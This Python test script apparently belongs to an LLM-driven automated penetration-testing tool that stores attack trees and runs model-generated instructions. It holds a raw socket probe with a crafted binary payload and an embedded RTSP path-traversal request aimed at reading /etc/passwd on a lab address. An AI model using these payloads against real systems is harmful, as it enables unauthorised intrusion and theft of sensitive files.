|
|
|
|
import re
|
|
|
|
|
import subprocess
|
|
|
|
|
import tempfile
|
|
|
|
|
import os
|
|
|
|
|
import pexpect
|
|
|
|
|
import struct
|
|
|
|
|
import sys
|
|
|
|
|
import mysql.connector
|
|
|
|
|
import requests
|
|
|
|
|
from mycode.LLMManager import LLMManager
|
|
|
|
|
from mycode.TaskObject import TaskObject
|
|
|
|
|
from myutils.PickleManager import g_PKM
|
|
|
|
|
from mycode.InstructionManager import g_instrM
|
|
|
|
|
from mycode.TaskManager import g_TaskM
|
|
|
|
|
from mycode.PythonTManager import PythonTManager
|
|
|
|
|
from myutils.ConfigManager import myCongif
|
|
|
|
|
from mycode.DBManager import app_DBM
|
|
|
|
|
import textwrap
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class Mytest:
|
|
|
|
|
def update_node_inter(self,attack_index):
|
|
|
|
|
attack_tree = g_PKM.ReadData(attack_index)
|
|
|
|
|
nodes = attack_tree.traverse_dfs()
|
|
|
|
|
# 06-0=>p
|
|
|
|
|
instr = nodes[6].get_instr_user().pop(0)
|
|
|
|
|
nodes[6].parent.get_instr_user().append(instr)
|
|
|
|
|
# 39-1
|
|
|
|
|
instr = nodes[39].get_instr_user().pop(1)
|
|
|
|
|
nodes[39].parent.get_instr_user().append(instr)
|
|
|
|
|
# 49-0
|
|
|
|
|
instr = nodes[49].get_instr_user().pop(0)
|
|
|
|
|
nodes[49].parent.get_instr_user().append(instr)
|
|
|
|
|
|
|
|
|
|
g_PKM.WriteData(attack_tree, attack_index)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def dynamic_fun(self):
|
|
|
|
|
import socket
|
|
|
|
|
try:
|
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
|
s.settimeout(20) # 增加超时时间
|
|
|
|
|
s.connect(("192.168.3.105", 52989))
|
|
|
|
|
|
|
|
|
|
# 基于返回的 "99 -1 45973" 字符串构造特殊payload
|
|
|
|
|
special_cmd = b'99\\x01\\x00\\x00\\x00' # 模拟协议头
|
|
|
|
|
s.sendall(special_cmd)
|
|
|
|
|
|
|
|
|
|
response = s.recv(2048)
|
|
|
|
|
s.close()
|
|
|
|
|
|
|
|
|
|
return (True, f"SpecialCmd Response: {response.hex()}")
|
|
|
|
|
except Exception as e:
|
|
|
|
|
return (False, str(e))
|
|
|
|
|
|
|
|
|
|
def do_test(self):
|
|
|
|
|
pass
|
|
|
|
|
|
|
|
|
|
def tmp_test(self):
|
|
|
|
|
list_a = [0,1,2,3,4,5,6,7,8,9]
|
|
|
|
|
|
|
|
|
|
isart = len(list_a) - 4 # 正常应该都是两个两个
|
|
|
|
|
if isart % 2 != 0:
|
|
|
|
|
print("c_msg数量不对称,需要检查逻辑!")
|
|
|
|
|
for msg in list_a[isart:]:
|
|
|
|
|
print(msg)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
|
# 示例使用
|
|
|
|
|
mytest = Mytest()
|
|
|
|
|
LLM = LLMManager(1)
|
|
|
|
|
current_path = os.path.dirname(os.path.realpath(__file__))
|
|
|
|
|
print(current_path)
|
|
|
|
|
test_type = 1
|
|
|
|
|
task_id = 49
|
|
|
|
|
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
|
|
|
|
|
|
|
|
|
|
if test_type == 0:
|
|
|
|
|
mytest.dynamic_fun()
|
|
|
|
|
elif test_type == 1:
|
|
|
|
|
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
|
|
|
|
|
instruction = '''python-code
|
|
|
|
|
def dynamic_fun():
|
|
|
|
|
import socket
|
|
|
|
|
|
|
|
|
|
try:
|
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
|
s.settimeout(20) # 设置超时时间为20秒
|
|
|
|
|
s.connect(("192.168.3.105", 11200))
|
|
|
|
|
|
|
|
|
|
# 发送畸形RTSP请求探测边界条件
|
|
|
|
|
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
|
|
|
|
|
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
|
|
|
|
|
|
|
|
|
|
s.send(payload.encode())
|
|
|
|
|
response = s.recv(4096).decode()
|
|
|
|
|
|
|
|
|
|
s.close()
|
|
|
|
|
|
|
|
|
|
if "404" in response:
|
|
|
|
|
return (False, "存在输入过滤机制")
|
|
|
|
|
elif "root:" in response:
|
|
|
|
|
return (True, "成功读取敏感文件")
|
|
|
|
|
else:
|
|
|
|
|
return (False, f"未知响应:{response}")
|
|
|
|
|
|
|
|
|
|
except Exception as e:
|
|
|
|
|
return (False, f"连接异常:{str(e)}")
|
|
|
|
|
'''
|
|
|
|
|
task_Object.PythonM.start_pool() #开个子进程池就行
|
|
|
|
|
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
|
|
|
|
|
# 暂存结果
|
|
|
|
|
oneres = {'执行指令': instr, '结果': reslut}
|
|
|
|
|
print("----执行结果----")
|
|
|
|
|
print(reslut)
|
|
|
|
|
elif test_type == 2: #给节点添加指令
|
|
|
|
|
node_path = "目标系统->192.168.3.105->52989端口"
|
|
|
|
|
instr_id = 3233
|
|
|
|
|
g_TaskM.load_tasks()
|
|
|
|
|
task = g_TaskM.tasks[task_id]
|
|
|
|
|
nodes = task.attack_tree.traverse_dfs()
|
|
|
|
|
cur_node = None
|
|
|
|
|
for node in nodes:
|
|
|
|
|
if node.path == node_path:
|
|
|
|
|
cur_node = node
|
|
|
|
|
break
|
|
|
|
|
if cur_node:
|
|
|
|
|
str_instr = app_DBM.get_one_instr(instr_id)
|
|
|
|
|
if "import" in str_instr:
|
|
|
|
|
str_instr = "python-code " + str_instr
|
|
|
|
|
cur_node.test_add_instr(str_instr)
|
|
|
|
|
cur_node.update_work_status(1)
|
|
|
|
|
#保存数据
|
|
|
|
|
g_PKM.WriteData(task.attack_tree,str(task.task_id))
|
|
|
|
|
else:
|
|
|
|
|
print("没找到节点!")
|
|
|
|
|
elif test_type ==3: #测试指令入节点
|
|
|
|
|
strinstr = '''
|
|
|
|
|
|
|
|
|
|
'''
|
|
|
|
|
strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
|
|
|
|
|
nodes = strNodes.split(', ')
|
|
|
|
|
unique_names = list(set(nodes)) # 去重
|
|
|
|
|
for node_name in unique_names:
|
|
|
|
|
print(node_name)
|
|
|
|
|
elif test_type == 4: # 修改Messages
|
|
|
|
|
attact_tree = g_PKM.ReadData("27")
|
|
|
|
|
# 创建一个新的节点
|
|
|
|
|
from mycode.AttackMap import TreeNode
|
|
|
|
|
testnode = TreeNode("test", 0)
|
|
|
|
|
LLM.build_initial_prompt(testnode) # 新的Message
|
|
|
|
|
systems = testnode.parent_messages[0]["content"]
|
|
|
|
|
# print(systems)
|
|
|
|
|
# 遍历node,查看有instr的ndoe
|
|
|
|
|
nodes = attact_tree.traverse_bfs()
|
|
|
|
|
for node in nodes:
|
|
|
|
|
node.parent_messages[0]["content"] = systems
|
|
|
|
|
g_PKM.WriteData(attact_tree, "27")
|
|
|
|
|
print("完成Messgae更新")
|
|
|
|
|
elif test_type ==5:
|
|
|
|
|
mytest.dynamic_fun()
|
|
|
|
|
elif test_type == 6:
|
|
|
|
|
mytest.tmp_test()
|
|
|
|
|
else:
|
|
|
|
|
pass
|
